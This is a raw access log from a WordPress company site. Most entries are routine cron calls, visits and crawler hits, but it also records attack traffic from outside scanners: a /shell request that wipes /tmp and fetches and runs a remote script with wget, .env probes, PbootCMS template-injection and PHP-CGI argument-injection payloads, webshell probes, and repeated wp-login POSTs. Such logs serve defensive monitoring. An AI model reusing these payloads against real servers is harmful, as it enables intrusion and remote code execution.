36.133.115.36 - - [15/Oct/2025:16:36:29 +0800] "POST /wp-cron.php?doing_wp_cron=1760517389.7052528858184814453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
78.153.140.179 - - [15/Oct/2025:16:36:29 +0800] "GET /.env HTTP/1.1" 404 31381 "-" "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SGH-T989 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
36.133.115.36 - - [15/Oct/2025:16:46:03 +0800] "POST /wp-cron.php?doing_wp_cron=1760517963.3787329196929931640625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
182.42.111.156 - - [15/Oct/2025:16:46:03 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
182.42.111.156 - - [15/Oct/2025:16:46:05 +0800] "GET / HTTP/1.1" 200 33468 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:16:46:46 +0800] "POST /wp-cron.php?doing_wp_cron=1760518006.6048290729522705078125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [15/Oct/2025:16:46:46 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:16:53:01 +0800] "POST /wp-cron.php?doing_wp_cron=1760518381.4397380352020263671875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
120.46.189.116 - - [15/Oct/2025:16:53:01 +0800] "GET / HTTP/1.1" 301 5 "http://www.cqqizhou.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.35 OPR/77.0.4054.203"
120.46.171.52 - - [15/Oct/2025:16:53:02 +0800] "GET / HTTP/1.1" 301 5 "http://www.cqqizhou.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.35 OPR/77.0.4054.203"
120.46.181.44 - - [15/Oct/2025:16:53:03 +0800] "GET / HTTP/1.1" 200 39371 "http://www.cqqizhou.com" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.35 OPR/77.0.4054.203"
36.133.115.36 - - [15/Oct/2025:16:53:54 +0800] "POST /wp-cron.php?doing_wp_cron=1760518434.3272469043731689453125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.6 - - [15/Oct/2025:16:53:54 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:16:56:32 +0800] "POST /wp-cron.php?doing_wp_cron=1760518592.0772659778594970703125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.166.128.187 - - [15/Oct/2025:16:56:32 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.166.128.187 - - [15/Oct/2025:16:56:36 +0800] "GET / HTTP/1.1" 200 33468 "http://www.cqqizhou.com" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:17:10:30 +0800] "POST /wp-cron.php?doing_wp_cron=1760519430.9604039192199707031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
35.203.211.23 - - [15/Oct/2025:17:10:31 +0800] "GET /wp-login.php HTTP/1.1" 200 8672 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
170.106.110.146 - - [15/Oct/2025:17:10:39 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:17:20:49 +0800] "POST /wp-cron.php?doing_wp_cron=1760520049.0875480175018310546875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.157.175.122 - - [15/Oct/2025:17:20:49 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:17:24:33 +0800] "POST /wp-cron.php?doing_wp_cron=1760520273.4771349430084228515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [15/Oct/2025:17:24:33 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:17:30:27 +0800] "POST /wp-cron.php?doing_wp_cron=1760520627.4238588809967041015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.155.129.131 - - [15/Oct/2025:17:30:27 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:17:31:42 +0800] "POST /wp-cron.php?doing_wp_cron=1760520702.1731419563293457031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
195.184.76.215 - - [15/Oct/2025:17:31:42 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"
36.133.115.36 - - [15/Oct/2025:17:47:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760521638.4214720726013183593750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.131.243.61 - - [15/Oct/2025:17:47:18 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.131.243.61 - - [15/Oct/2025:17:47:20 +0800] "GET / HTTP/1.1" 200 33468 "http://36.133.115.36" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:17:51:39 +0800] "POST /wp-cron.php?doing_wp_cron=1760521899.1916849613189697265625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.44 - - [15/Oct/2025:17:51:39 +0800] "GET / HTTP/1.1" 200 33468 "http://cqqizhou.com/" "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Mobile Safari/537.36; 360Spider"
8.210.16.217 - - [15/Oct/2025:17:57:49 +0800] "GET /shell?cd+/tmp;rm+-rf+*;wget+ scamanje.stresserit.pro/jaws;sh+/tmp/jaws HTTP/1.1" 499 0 "-" "Hello, world"
36.133.115.36 - - [15/Oct/2025:17:57:49 +0800] "POST /wp-cron.php?doing_wp_cron=1760522269.7136070728302001953125 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
36.133.115.36 - - [15/Oct/2025:18:04:52 +0800] "POST /wp-cron.php?doing_wp_cron=1760522692.3828821182250976562500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [15/Oct/2025:18:04:52 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:18:11:35 +0800] "POST /wp-cron.php?doing_wp_cron=1760523095.4780650138854980468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.91 - - [15/Oct/2025:18:11:35 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:18:33:14 +0800] "POST /wp-cron.php?doing_wp_cron=1760524394.1527709960937500000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
176.65.141.86 - - [15/Oct/2025:18:33:14 +0800] "GET /cgi-bin/luci/;stok=/locale HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [15/Oct/2025:18:43:01 +0800] "POST /wp-cron.php?doing_wp_cron=1760524981.7215468883514404296875 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
87.120.191.90 - - [15/Oct/2025:18:43:02 +0800] "GET / HTTP/1.1" 200 33468 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [15/Oct/2025:18:47:39 +0800] "POST /wp-cron.php?doing_wp_cron=1760525259.6167669296264648437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
20.64.106.18 - - [15/Oct/2025:18:47:39 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
42.236.101.220 - - [15/Oct/2025:18:53:02 +0800] "GET / HTTP/1.1" 200 39371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:18:53:18 +0800] "POST /wp-cron.php?doing_wp_cron=1760525597.9907970428466796875000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.101.220 - - [15/Oct/2025:18:53:18 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
42.236.17.7 - - [15/Oct/2025:18:56:23 +0800] "GET / HTTP/1.1" 200 39371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:18:56:30 +0800] "POST /wp-cron.php?doing_wp_cron=1760525790.9286770820617675781250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
42.236.17.7 - - [15/Oct/2025:18:56:31 +0800] "POST /wp-admin/admin-ajax.php HTTP/1.1" 403 33 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:19:02:22 +0800] "POST /wp-cron.php?doing_wp_cron=1760526142.5555191040039062500000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
183.134.59.131 - - [15/Oct/2025:19:02:22 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Linux; U; Android 8.0.0; zh-cn; DUK-AL20 Build/HUAWEIDUK-AL20) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/8.3 Mobile Safari/537.36"
36.133.115.36 - - [15/Oct/2025:19:09:19 +0800] "POST /wp-cron.php?doing_wp_cron=1760526559.4661560058593750000000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
45.153.34.54 - - [15/Oct/2025:19:09:20 +0800] "GET / HTTP/1.0" 200 109870 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
220.181.108.176 - - [15/Oct/2025:19:47:52 +0800] "GET /portfolio/ HTTP/1.1" 200 20575 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
116.179.32.130 - - [15/Oct/2025:20:04:14 +0800] "GET /portfolio-category/pickled-coil/ HTTP/1.1" 200 20938 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [15/Oct/2025:20:04:37 +0800] "POST /wp-cron.php?doing_wp_cron=1760529877.7496340274810791015625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
220.181.51.92 - - [15/Oct/2025:20:04:37 +0800] "GET /wp-content/uploads/2025/07/1753453029-%CB%E1%CF%B4%BE%EDproduct_Single600.webp HTTP/1.1" 404 31381 "http://cqqizhou.com/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36"
220.181.108.166 - - [15/Oct/2025:20:06:01 +0800] "GET /portfolio-category/pickled-coil/ HTTP/1.1" 200 20938 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
36.133.115.36 - - [15/Oct/2025:20:25:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760531125.7563939094543457031250 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
43.159.145.153 - - [15/Oct/2025:20:25:26 +0800] "GET / HTTP/1.1" 200 33467 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [15/Oct/2025:21:04:32 +0800] "POST /wp-cron.php?doing_wp_cron=1760533472.7164189815521240234375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:04:32 +0800] "GET /wp-login.php HTTP/1.1" 200 2779 "https://www.google.com/search?q=wordpress" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15"
36.133.115.36 - - [15/Oct/2025:21:04:56 +0800] "POST /wp-cron.php?doing_wp_cron=1760533496.0311789512634277343750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
38.175.215.9 - - [15/Oct/2025:21:04:56 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1"
38.175.215.9 - - [15/Oct/2025:21:04:57 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0b7) Gecko/20100101 Firefox/4.0b7"
38.175.215.9 - - [15/Oct/2025:21:04:57 +0800] "GET /uqd.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/uqd.php" "Mozilla/5.0 (Windows NT 5.1; U; pl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00"
38.175.215.9 - - [15/Oct/2025:21:04:58 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2"
38.175.215.9 - - [15/Oct/2025:21:04:59 +0800] "GET /pxab.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/pxab.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre"
38.175.215.9 - - [15/Oct/2025:21:04:59 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7"
38.175.215.9 - - [15/Oct/2025:21:05:00 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)"
38.175.215.9 - - [15/Oct/2025:21:05:00 +0800] "GET /fgxn.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/fgxn.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.8 Safari/530.5"
38.175.215.9 - - [15/Oct/2025:21:05:01 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; fr-FR) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4"
38.175.215.9 - - [15/Oct/2025:21:05:01 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://www.cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Macintosh; U; Mac OS X 10_6_1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5"
38.175.215.9 - - [15/Oct/2025:21:05:01 +0800] "GET /uxe.php HTTP/1.1" 404 27 "http://cqqizhou.com/uxe.php" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.7 Safari/533.2"
38.175.215.9 - - [15/Oct/2025:21:05:01 +0800] "GET /scsf.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/scsf.php" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101213 Firefox/4.0b8pre"
38.175.215.9 - - [15/Oct/2025:21:05:02 +0800] "POST /index.php?s=captcha HTTP/1.1" 200 65005 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.0"
38.175.215.9 - - [15/Oct/2025:21:05:02 +0800] "POST / HTTP/1.1" 200 151919 "http://www.cqqizhou.com/" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)"
38.175.215.9 - - [15/Oct/2025:21:05:03 +0800] "GET /hpru.php HTTP/1.1" 404 27 "http://cqqizhou.com/hpru.php" "Mozilla/4.7 (compatible; OffByOne; Windows 2000)"
38.175.215.9 - - [15/Oct/2025:21:05:03 +0800] "GET /trwz.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/trwz.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19"
38.175.215.9 - - [15/Oct/2025:21:05:03 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2"
38.175.215.9 - - [15/Oct/2025:21:05:04 +0800] "POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1" 404 31381 "http://www.cqqizhou.com/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16"
38.175.215.9 - - [15/Oct/2025:21:05:04 +0800] "GET /tani.php HTTP/1.1" 404 27 "http://cqqizhou.com/tani.php" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19"
38.175.215.9 - - [15/Oct/2025:21:05:04 +0800] "GET /xoyv.php HTTP/1.1" 404 27 "http://www.cqqizhou.com/xoyv.php" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.463.0 Safari/534.3"
38.175.215.9 - - [15/Oct/2025:21:05:04 +0800] "POST /index.php?s=captcha HTTP/1.1" 400 2528 "http://cqqizhou.com/index.php?s=captcha" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.8 Safari/532.2"
38.175.215.9 - - [15/Oct/2025:21:05:05 +0800] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "http://www.cqqizhou.com/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_0; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.307.11 Safari/532.9"
38.175.215.9 - - [15/Oct/2025:21:05:05 +0800] "GET /llzo.php HTTP/1.1" 404 27 "http://cqqizhou.com/llzo.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW) AppleWebKit/533.19.4 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
38.175.215.9 - - [15/Oct/2025:21:05:06 +0800] "POST / HTTP/1.1" 200 151919 "http://cqqizhou.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16"
38.175.215.9 - - [15/Oct/2025:21:05:07 +0800] "GET /bkqu.php HTTP/1.1" 404 27 "http://cqqizhou.com/bkqu.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506)"
38.175.215.9 - - [15/Oct/2025:21:05:07 +0800] "POST /?tag/index=&tag=%7Bpbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)%7D(123)%7B/pbhome/Indexoot:if%7D&tagstpl=news.html&lnoc2tspfar1_ue HTTP/1.1" 404 31381 "http://cqqizhou.com/?tag/index=&tag={pbohome/Indexot:if(1)(usort/*%3e*/(post/*%3e*/(/*%3e*/1),create_function/*%3e*/(/*%3e*/post/*%3e*/(/*%3e*/2),post/*%3e*/(/*%3e*/3))));//)}(123){/pbhome/Indexoot:if}&tagstpl=news.html&lnoc2tspfar1_ue" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3"
38.175.215.9 - - [15/Oct/2025:21:05:08 +0800] "GET /yjmt.php HTTP/1.1" 404 27 "http://cqqizhou.com/yjmt.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/526.9 (KHTML, like Gecko) Version/4.0dp1 Safari/526.8"
38.175.215.9 - - [15/Oct/2025:21:05:08 +0800] "POST /php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input HTTP/1.1" 404 31381 "http://cqqizhou.com/php-cgi/php-cgi.exe?%add+allow_url_include%3d1+%add+auto_prepend_file%3dphp://input" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10"
141.98.11.188 - - [15/Oct/2025:21:05:10 +0800] "POST /wp-login.php HTTP/1.1" 200 2976 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:21:06:14 +0800] "POST /wp-cron.php?doing_wp_cron=1760533574.7555079460144042968750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:06:14 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15"
119.23.78.28 - - [15/Oct/2025:21:06:24 +0800] "GET / HTTP/1.1" 200 39371 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:21:07:06 +0800] "POST /wp-cron.php?doing_wp_cron=1760533626.2586081027984619140625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:07:06 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
141.98.11.188 - - [15/Oct/2025:21:07:42 +0800] "POST /wp-login.php HTTP/1.1" 200 2977 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:121.0) Gecko/20100101 Firefox/121.0"
36.133.115.36 - - [15/Oct/2025:21:08:25 +0800] "POST /wp-cron.php?doing_wp_cron=1760533705.7245039939880371093750 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:08:25 +0800] "POST /wp-login.php HTTP/1.1" 200 2974 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:21:09:34 +0800] "POST /wp-cron.php?doing_wp_cron=1760533774.8828809261322021484375 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:09:34 +0800] "POST /wp-login.php HTTP/1.1" 200 2891 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:21:10:32 +0800] "POST /wp-cron.php?doing_wp_cron=1760533832.6329729557037353515625 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:10:32 +0800] "POST /wp-login.php HTTP/1.1" 200 2920 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
36.133.115.36 - - [15/Oct/2025:21:11:11 +0800] "POST /wp-cron.php?doing_wp_cron=1760533871.8252429962158203125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
141.98.11.188 - - [15/Oct/2025:21:11:11 +0800] "POST /wp-login.php HTTP/1.1" 200 2978 "http://cqqizhou.com/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:118.0) Gecko/20100101 Firefox/118.0"
36.133.115.36 - - [15/Oct/2025:21:12:02 +0800] "POST /wp-cron.php?doing_wp_cron=1760533922.0456609725952148437500 HTTP/1.1" 200 31 "-" "WordPress/6.8.2; http://cqqizhou.com"
